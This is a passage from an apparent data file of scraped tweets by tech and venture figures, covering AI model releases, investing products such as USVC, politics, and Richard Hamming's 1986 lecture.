"https://nitter.net/paulg/status/2048017345000415744#m", + "published_at": "2026-04-25T12:32:40+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 23 years old with no advanced mathematics training solves Erdős problem with ChatGPT Pro. \"What’s beginning to emerge is that the problem was maybe easier than expected, and it was like there was some kind of mental block.”-Terence Tao https://www.scientificamerican.com/article/amateur-armed-with-chatgpt-vibe-maths-a-60-year-old-problem/", + "url": "https://nitter.net/Ananyo/status/2047992864118894954#m", + "published_at": "2026-04-25T10:55:23+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: GitHub outages since Microsoft acquisition 🤣", + "url": "https://nitter.net/vaggelisdrak/status/2047957234664030380#m", + "published_at": "2026-04-25T08:33:48+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Hamming's talk is so important that I reproduced it on my site. It's one of the only things on my site written by someone else.\n\nhttps://paulgraham.com/hamming.html", + "url": "https://nitter.net/paulg/status/2047944827887591681#m", + "published_at": "2026-04-25T07:44:30+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "R to @paulg: Auction houses could fix this by giving you timegrapher numbers. But the only auction house that does this so far is a small Swiss one that specializes in watches (Ineichen). None of the big houses do.", + "url": "https://nitter.net/paulg/status/2047942555254288757#m", + "published_at": "2026-04-25T07:35:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "The best way to buy art is at auction, once you know what you're doing. But old watches you should buy from dealers. You can get enough information about paintings to judge their condition, but you have no idea what's inside watches.", + "url": "https://nitter.net/paulg/status/2047941243234107691#m", + "published_at": "2026-04-25T07:30:15+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://nitter.net/elonmusk/status/2047877294476116184#m", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://nitter.net/DavidSacks/status/2047871382923469241#m", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://nitter.net/DavidSacks/status/2047867592790946189#m", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://nitter.net/Svwang1/status/2047858045057909226#m", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://nitter.net/TheChiefNerd/status/2047842000632713369#m", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this was a good week.\n\nproud of the team.\n\nhappy building!", + "url": "https://nitter.net/sama/status/2047823357635354814#m", + "published_at": "2026-04-24T23:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://nitter.net/jayplemons/status/2047823154655932696#m", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://nitter.net/theallinpod/status/2047808256047821141#m", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This week I got to sit down with two truly generational CEOs and ask them anything: \n\n@tobi @Shopify ($160BN Market Cap)\n\nAdam Foroughi @AppLovin ($160BN Market Cap)\n\nI have the best job in the world.", + "url": "https://nitter.net/HarryStebbings/status/2047792195868967172#m", + "published_at": "2026-04-24T21:38:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://nitter.net/AravSrinivas/status/2047788775468908840#m", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 and GPT-5.5 Pro are now available in the API!", + "url": "https://nitter.net/sama/status/2047787124846653895#m", + "published_at": "2026-04-24T21:17:51+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss:\n\n🇦🇺 0\n🇨🇦 0\n🇩🇰 0\n🇫🇮 0\n🇫🇷 0\n🇩🇪 0\n🇮🇸 0\n🇮🇪 0\n🇮🇹 0\n🇯🇵 0\n🇳🇱 0\n🇳🇴 0\n🇵🇹 0\n🇪🇸 0\n🇸🇪 0\n🇬🇧 0\n🇺🇸 530,000\n\nThere’s a lesson there.", + "url": "https://nitter.net/Strandjunker/status/2047780272297382384#m", + "published_at": "2026-04-24T20:50:37+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: BREAKING: A Syrian billionaire needed U.S. sanctions lifted so he could cash in on $12 billion in reconstruction contracts, per NYT.\n\nIn an attempt to influence American foreign policy, he proposed a Trump-branded golf course, cut Jared Kushner & Ivanka Trump into a multibillion-dollar real estate deal for a resort in Albania, and had someone physically deliver a stone engraved with the Trump family crest to a Republican Member of Congress with instructions to take it to the White House to get the President's attention.\n\nTrump threw his weight behind repealing the sanctions. They were lifted. The contracts are moving, and the Trump family’s deals are expanding.", + "url": "https://nitter.net/unusual_whales/status/2047761493274571036#m", + "published_at": "2026-04-24T19:36:00+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton).\n\nWe talked about ConvNeXt and whether architecture still matters; dataset bias and what \"good data\" actually looks like; ImageBind and why vision is the natural bridge across modalities; CLIP's blind spots; memory as the real bottleneck behind the agent hype; whether LLMs have world models; and Transformers Without Normalization.\n\nFor years, the vision community debated what actually matters: architecture, inductive bias, self-attention vs convolution. After a lot of back-and-forth, we ended up in a funny place: ViT and ConvNet give roughly the same performance once you tune the details.\n\nWhat I find interesting is that once you reach a certain performance level, it becomes much easier to swap and tweak components without really changing the outcome.\n\nTalking to Zhuang on this episode, I kept wondering whether the same is now true for LLMs. If we wil spent serious time on an alternative architecture today, would you actually get a meaningfully different model, or just land on the same Pareto curve with extra steps?\n\nI'm starting to suspect it's the latter. Architecture matters less than we think. Data, compute, and a handful of pillars do most of the work.", + "url": "https://nitter.net/ziv_ravid/status/2047760455679246500#m", + "published_at": "2026-04-24T19:31:52+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know your feedback!", + "url": "https://nitter.net/AravSrinivas/status/2047753276888854595#m", + "published_at": "2026-04-24T19:03:21+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: Adopting Claude speak in my regular life, episode 1:\n\nPartner: Did you do the dishes tonight?\nMe: Yes they're done.\nPartner: Why are they still dirty?\nMe: You're right to push back. I didn't actually do them.", + "url": "https://nitter.net/awnihannun/status/2047748613976264835#m", + "published_at": "2026-04-24T18:44:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers.\n\nGPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.", + "url": "https://nitter.net/perplexity_ai/status/2047748486767272243#m", + "published_at": "2026-04-24T18:44:19+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The web is disappearing 🕳️\n\nAccording to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible.\n\nBut that’s not the whole story.\n\nIn a new study published in Internet Archive's book, VANISHING CULTURE, data scientists working with the Wayback Machine have found:\n16% have been restored through the Wayback Machine.\n56% are preserved before they disappear.\n\nPreservation is the remedy for cultural loss.\n\n📚 Read VANISHING CULTURE free from the Internet Archive \n\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new \n\n#VanishingCulture #DigitalMemory #InternetArchive #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2047733594064408894#m", + "published_at": "2026-04-24T17:45:08+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.", + "url": "https://nitter.net/DavidSacks/status/2047717649849659586#m", + "published_at": "2026-04-24T16:41:47+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。\n\n投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。", + "url": "https://nitter.net/Svwang1/status/2047703469063377001#m", + "published_at": "2026-04-24T15:45:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal:\nhttps://cnb.cx/4d3HAKp", + "url": "https://nitter.net/SquawkCNBC/status/2047703023690924289#m", + "published_at": "2026-04-24T15:43:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。\n\n他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。\n\n这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。\n\n最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能体。\n\n因为它们本质上只是下一个token预测机,只能在文字和像素的空间里做统计关联,从来没有真正理解过这个世界的因果。\n它们不会预测行动的后果,不会真正的规划,更没有常识。\n\n当然,我不是说LLM没用,短期来看,scaling LLM+微调+工具调用,已经能吃掉80%的白领工作,硅谷所有人往这里冲,也算是完全理性,毕竟钱和机会就在这里。\n\n但长期来看,这是一条有天花板的路。因为你永远不可能在文字地图上,开出一辆真正的车。\n机器人、具身智能、长期自主代理、真正的科学发现,这些坎,纯LLM永远跨不过去。\n\nLeCun说,真正的智能必须有世界模型。就是说给定当前的状态和你要做的动作,你要能准确预测下一秒世界会变成什么样。不是简单的像素级的生成,还需要对物理规律和因果关系的抽象建模。\n\n最近Figure、特斯拉、谷歌的机器人项目,其实都在偷偷补这一课,只是没人愿意公开说,LLM不是万能地基。\n\n我理解未来真正的智能,一定是混合栈,LLM负责语言交互和符号推理,世界模型负责因果预测和长期规划,执行层负责把计划变成动作。\n\nLeCun从来没说过要抛弃LLM,他只是反对把LLM当成一切的答案。\n\n硅谷现在最可怕的问题不是卷,是所有人都在同一条赛道上卷得太狠,以至于忘了终点其实根本不在这条赛道上。\n\n世界模型这道坎,迟早要跨。\n而谁先跨过去,谁就是下一个时代的赢家。\n#YannLeCun #世界模型 #AGI #大模型 #具身智能", + "url": "https://nitter.net/AYi_AInotes/status/2047697898989572176#m", + "published_at": "2026-04-24T15:23:18+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about are the quality of their products, and we don’t want the bias creeping into the products.\"", + "url": "https://nitter.net/RapidResponse47/status/2047694657107165519#m", + "published_at": "2026-04-24T15:10:25+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "How Claude Design Will Hurt Figma\n\n\"Claude Design will not replace Figma directly, but it will chip away at it.\n\nIt removes the need to wait for designers by letting people go straight from idea to product.\n\nThat bypass is the real threat, not a head-on competitor.\" @jasonlk\n\nLove to hear your thoughts on this @zoink @andrew__reed @karrisaarinen", + "url": "https://nitter.net/HarryStebbings/status/2047693043080261672#m", + "published_at": "2026-04-24T15:04:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "🫶", + "url": "https://nitter.net/sama/status/2047683787828703289#m", + "published_at": "2026-04-24T14:27:13+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their whole lives doing forgettable work.\n\nHis name was Richard Hamming. He won the Turing Award. He invented error-correcting codes that made modern computing possible. And he spent 30 years at Bell Labs sitting in a cafeteria at lunch watching which scientists became legendary and which ones faded into nothing.\n\nIn March 1986, he walked into a Bellcore auditorium in front of 200 researchers and told them exactly what he had seen.\n\nHere's the framework that has been quoted by every serious scientist for the last 40 years.\n\nHis opening line landed like a punch. He said most scientists he worked with at Bell Labs were just as smart as the Nobel Prize winners. Just as hardworking. Just as credentialed. And yet at the end of a 40-year career, one group had changed entire fields and the other group was forgotten by the time they retired.\n\nHe wanted to know what the difference actually was. And he said it wasn't luck. It wasn't IQ. It was a specific set of habits that almost nobody is willing to follow.\n\nThe first habit was the one that hurts the most to hear. He said most scientists deliberately avoid the most important problem in their field because the odds of failure are too high. They pick a safe adjacent problem, solve it cleanly, publish it, and move on. And because they never swing at the hard problem, they never hit it. He said if you do not work on an important problem, it is unlikely you will do important work. That is not a motivational line. That is a logical one.\n\nThe second habit was about doors. Literal doors. He noticed that the scientists at Bell Labs who kept their office doors closed got more done in the short term because they had no interruptions. But the scientists who kept their doors open got more done over a career. The open-door scientists were interrupted constantly. They also absorbed every new idea passing through the hallway. Ten years in, they were working on problems the closed-door scientists did not even know existed.\n\nThe third habit was inversion. When Bell Labs refused to give him the team of programmers he wanted, Hamming sat with the rejection for weeks. Then he flipped the question. Instead of asking for programmers to write the programs, he asked why machines could not write the programs themselves. That single inversion pushed him into the frontier of computer science. He said the pattern repeats everywhere. What looks like a defect, if you flip it correctly, becomes the exact thing that pushes you ahead of everyone else.\n\nThe fourth habit was the one that hit me the hardest. He said knowledge and productivity compound like interest. Someone who works 10 percent harder than you does not produce 10 percent more over a career. They produce twice as much. The gap doesn't add. It multiplies. And it compounds silently for years before anyone notices.\n\nHe finished the lecture with a line I have never been able to shake.\n\nHe said Pasteur's famous quote is right. Luck favors the prepared mind. But he meant it literally. You don't hope for luck. You engineer the conditions where luck can land on you. Open doors. Important problems. Inverted questions. Compounded hours. Those are not traits. Those are choices you make every single day.\n\nThe transcript has been sitting on the University of Virginia's computer science website for almost 30 years. The video is free on YouTube. Stripe Press reprinted the full lectures as a book in 2020 and Bret Victor wrote the foreword.\n\nHamming died in 1998. He gave his final lecture a few weeks before. He was 82.\n\nThe lecture that explains why some careers become legendary and others disappear is still free. Most people who could benefit from it will never open it.", + "url": "https://nitter.net/ihtesham2005/status/2047680485208531152#m", + "published_at": "2026-04-24T14:14:06+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. \n\nAlso some other eyebrow-raising sections in this interview.", + "url": "https://nitter.net/Discoplomacy/status/2047676640059154653#m", + "published_at": "2026-04-24T13:58:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share", + "url": "https://nitter.net/DavidSacks/status/2047672359377588241#m", + "published_at": "2026-04-24T13:41:49+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs were going away?", + "url": "https://nitter.net/DavidSacks/status/2047671706660073767#m", + "published_at": "2026-04-24T13:39:13+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1", + "url": "https://nitter.net/JeffDean/status/2047665074471387456#m", + "published_at": "2026-04-24T13:12:52+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Fundrise VCX is exactly why USVC needs to exist.\n\nRetail wants access to OpenAI, Anthropic, SpaceX, xAI, etc. That demand is not going away.\n\nVCX turned that demand into a liquid public wrapper that still trades around 4-5x NAV.\n\nAt today’s ~$90 price vs. recent NAV references around ~$19, buyers may be paying roughly $4-5 for every $1 of actual private tech exposure.\n\nAccess at the wrong price is not access. It’s just scarcity monetized.\n\nYes, venture has fees. It always has. You pay for access, selection, and portfolio construction.\n\nBut paying venture fees is very different from paying 4-5x NAV for the wrapper before the venture return even happens.\n\nThe companies inside VCX can be great and retail can still get wrecked if the premium collapses.\n\nUSVC is the cleaner answer: diversified private tech exposure, SEC-registered, available to unaccredited investors, and bought around NAV instead of through a hyped public wrapper trading miles above its assets.\n\nThe real test for me is simple: my mom wants to invest in startups/private tech.\n\nI would rather she do USVC 100x over VCX, because at least with USVC I can understand the structure, explain the tradeoffs, and know she is not just paying a massive public-market hype premium for the wrapper.\n\nIn venture, access matters.\n\nBut the wrapper can still ruin the investment. And right now, some products are monetizing retail demand for private AI/startup exposure more than they are solving it.\n\nUSVC is at least aimed at the right problem.", + "url": "https://nitter.net/alexbass/status/2047645157080658335#m", + "published_at": "2026-04-24T11:53:43+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them.\n2. A robot-rich future can't be built with AIs that don't understand the physical world and don't anticipate the consequences of their actions. And LLMs really don't.\n3. The future in the cartoon looks pretty dystopian TBH, but even a non-dystopian version will require world models and zero-shot planning abilities.\n4. I rarely wear a suit and absolutely never wear a tie.\n5. I would never ever place a coffee mug on top of a piece equipment.\n6. I hope I'll look this young in 2032.", + "url": "https://nitter.net/ylecun/status/2047636569767419951#m", + "published_at": "2026-04-24T11:19:36+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques.\n\nWith @ELLISUnitMadrid.\n\n📍 Madrid 🇪🇸 \n📅 June 8-19th\n⏰ Apply by June 3rd\n🔗 https://cig.fi.upm.es/mlas/", + "url": "https://nitter.net/ELLISforEurope/status/2047624126047670758#m", + "published_at": "2026-04-24T10:30:09+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la \"Savage Nation\". Ce texte inhabituellement long, inhabituellement cohérent, mérite une lecture attentive. Il révèle bien plus qu'une opinion sur l'immigration.\n\n▶️ Commençons par l'évidence que tout le monde remarque : ce texte n'a pas été écrit par Donald Trump.\nTrump écrit en majuscules intempestives, en phrases courtes, avec des digressions abruptes et une syntaxe chaotique. Ce texte est long, structuré, argumenté, avec une progression rhétorique délibérée, une introduction, des exemples, une montée en puissance émotionnelle, une conclusion en appel à l'action. C'est la marque de fabrique de Stephen Miller, architecte de la politique migratoire de Trump depuis dix ans, dont l'organisation America First Legal est précisément celle qui a construit les arguments juridiques soumis à la Cour Suprême. \n\nMiller rédige. Trump signe. C'est une mécanique documentée depuis des années.\n\n▶️ Ce qui rend ce texte particulièrement remarquable, c'est son timing et son objectif.\n\nLe 1er avril, Trump a assisté en personne aux plaidoiries de la Cour Suprême sur le droit du sol, la première fois dans l'histoire américaine qu'un président en exercice assiste à des arguments oraux devant la Cour. \n\nLa majorité des juges, y compris ceux nommés par Trump lui-même, ont exprimé un scepticisme marqué.\n\nCe post fleuve publié dans les jours suivants n'est pas une réflexion spontanée. C'est une tentative d'influencer l'opinion publique, et peut-être les juges eux-mêmes, avant que la décision ne tombe en juin. \n\nVenons-en aux affirmations les plus choquantes du texte, point par point.\n\n▶️ \"Nous sommes le seul pays au monde assez stupide pour autoriser le droit du sol.\" C'est factuellement faux. Une trentaine de pays garantissent la citoyenneté aux enfants nés sur leur territoire, dont le Canada, le Mexique, le Brésil et l'Argentine. \n\n▶️ Trump écrit en substance que les Indiens et les Chinois qu'il qualifie de \"gangsters with laptops\", occupent toutes les places dans la tech californienne, que les Blancs n'ont plus leur chance, et que ce n'est plus leur pays. \n\nLes ingénieurs d'origine indienne et chinoise sont les architectes de l'économie technologique américaine, la même économie dont Trump se félicite en permanence. Google, Microsoft, Adobe, IBM, Palo Alto Networks, Arista Networks : autant de géants américains dirigés par des PDG d'origine indienne. \n\nSelon le rapport Stanford HAI 2026, les États-Unis investissent 285 milliards en IA et 80% des chercheurs en IA américains sont nés à l'étranger. Expulser ou décourager ces populations, c'est amputer l'innovation américaine au bénéfice de la Chine, l'adversaire que Trump prétend combattre.\n\n▶️ L'ACLU (American Civil Liberties Union, organisation fondée en 1920 pour défendre les libertés constitutionnelles américaines) est qualifiée \"d'organisation criminelle, la plus dangereuse de l'histoire des États-Unis,\" plus dangereuse que l'Iran. Trump écrit qu'elle \"a fait plus de dégâts à ce pays que l'Iran n'en a jamais fait\" et appelle à la poursuivre sous une loi antimafia. \n\n▶️ \"Le melting pot est terminé. C'est juste une marmite à cash.\" Le melting pot (le creuset en français), est le mythe fondateur de l'identité américaine depuis deux siècles. Lithuaniens, Roumains, Russes, Polonais, Italiens : Trump les cite lui-même comme exemples de bonnes intégrations. Il oublie de mentionner que ces vagues migratoires européennes ont elles aussi été accueillies avec les mêmes discours : les Irlandais traités de sous-humains, les Italiens lynchés, les Polonais moqués pour leur manque de loyauté. L'histoire se répète. Seule la nationalité des boucs émissaires change.\n\n📕 Dans Le Pantin de la Maison Blanche, j'analyse comment Stephen Miller, idéologue de l'immigration ethno-nationaliste depuis vingt ans, utilise Trump comme amplificateur de sa vision du monde. Ce texte en est la démonstration la plus pure.\n\nL'Amérique a été construite par les enfants de ceux que ce texte veut expulser. Jensen Huang, NVIDIA, l'entreprise qui alimente la révolution IA mondiale, est né à Taïwan. Sundar Pichai, Google, est né en Inde. Satya Nadella, Microsoft, est né en Inde. Chacun d'eux est le produit d'une Amérique qui croyait encore à la vertu de ce fameux meltin pot. Ce texte leur dit que cette Amérique est terminée.\n\n📖 Le Pantin de la Maison Blanche → https://www.amazon.fr/dp/B0GPCCMS68/", + "url": "https://nitter.net/cginisty/status/2047565736382534091#m", + "published_at": "2026-04-24T06:38:08+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/avlok/status/204754692…", + "url": "https://nitter.net/naval/status/2047550896670908809#m", + "published_at": "2026-04-24T05:39:10+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I’ve seen a lot of questions about USVC, AngelList’s newest product. First, don’t invest in venture capital if you can’t afford to lose your money. Put your savings somewhere safer. But if you’re considering USVC, here’s a thread that answers the most common questions and explains how it works:", + "url": "https://nitter.net/avlok/status/2047546920747307466#m", + "published_at": "2026-04-24T05:23:22+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I've been thinking about local LLMs a lot these days.", + "url": "https://nitter.net/liuliu/status/2047527371486658814#m", + "published_at": "2026-04-24T04:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Hari nails it:\n\n“Don’t listen to people who don’t know how private markets work.”", + "url": "https://nitter.net/naval/status/2047520212787015748#m", + "published_at": "2026-04-24T03:37:14+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/haridigresses/status/2…", + "url": "https://nitter.net/naval/status/2047519250433421604#m", + "published_at": "2026-04-24T03:33:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "R to @naval: x.com/nivi/status/2047471220…", + "url": "https://nitter.net/naval/status/2047510419565420779#m", + "published_at": "2026-04-24T02:58:19+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "New life plan-\n \nMove to Brooklyn\nGet neck tat\nRide bike everywhere\nCold brew own coffee (also start drinking coffee)\nAdopt 12 year old stray cat, name him Nietzsche\nVape mango pods, but ironically\nWear scarf everywhere during summer", + "url": "https://nitter.net/eladgil/status/2047489459378397604#m", + "published_at": "2026-04-24T01:35:02+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: USVC is a new fund being offered by Naval, it's been discussed widely on X. I have some thoughts and why people should look into it. I have no connection with it and not being paid to shill. \n\nBack when I started dating my wife, I told her to set up a Roth IRA and buy Apple. Every year, I'd have her put the max limit into a Roth IRA and buy Apple. Apple was $20 or so. When I checked it earlier this year, I was blown away. It was a small mount of money that grew into something nice.\n\nApple, Facebook, Nvidia, Tesla, etc. would IPO early. You could have MASSIVE outsized gains if you were investing in the early 2010's. \n\nYou couldn't get into them pre-IPO unless you had a connection. There are people on this site who pretend to be geniuses because a friend hooked them up with a tag-along investment into the seed round of Uber. It was a bro favor, good for them, they do leave that part out tho and let the false narrative of being a genius investor flow through. \n\nYou used to be able to buy in pre-IPO with a small check. Now it's almost impossible unless you have a friend, and they set up an SPV, they are usually doing you a favor, because huge funds and institutional investors gobble it all up. (This has also lead to the VC class screwing themselves over, because if you can't buy today's version of Apple at $20, because all the big gains are sucked up before the public offering, then why do you have buy in into this entire system?)\n\nYou could, as a small investor, get huge results pre-IPO via a small check, or also do well after the IPO, because companies IPO'ed earlier. Ie Apple at $20, Amazon in the 20's, etc.\n\nIt's very hard to get big gains now, because companies remain private much longer. Many companies don't want to IPO and then deal with the hassle of lawfare. Look at what happened to Elon in Delaware. \n\nFor us, as an ordinary person, this means that by the time a company goes public, we are \"last money in.\" This is why I always tell friends and family to buy SPY (or FXAIX) and QQQM. Don't day trade. You won't 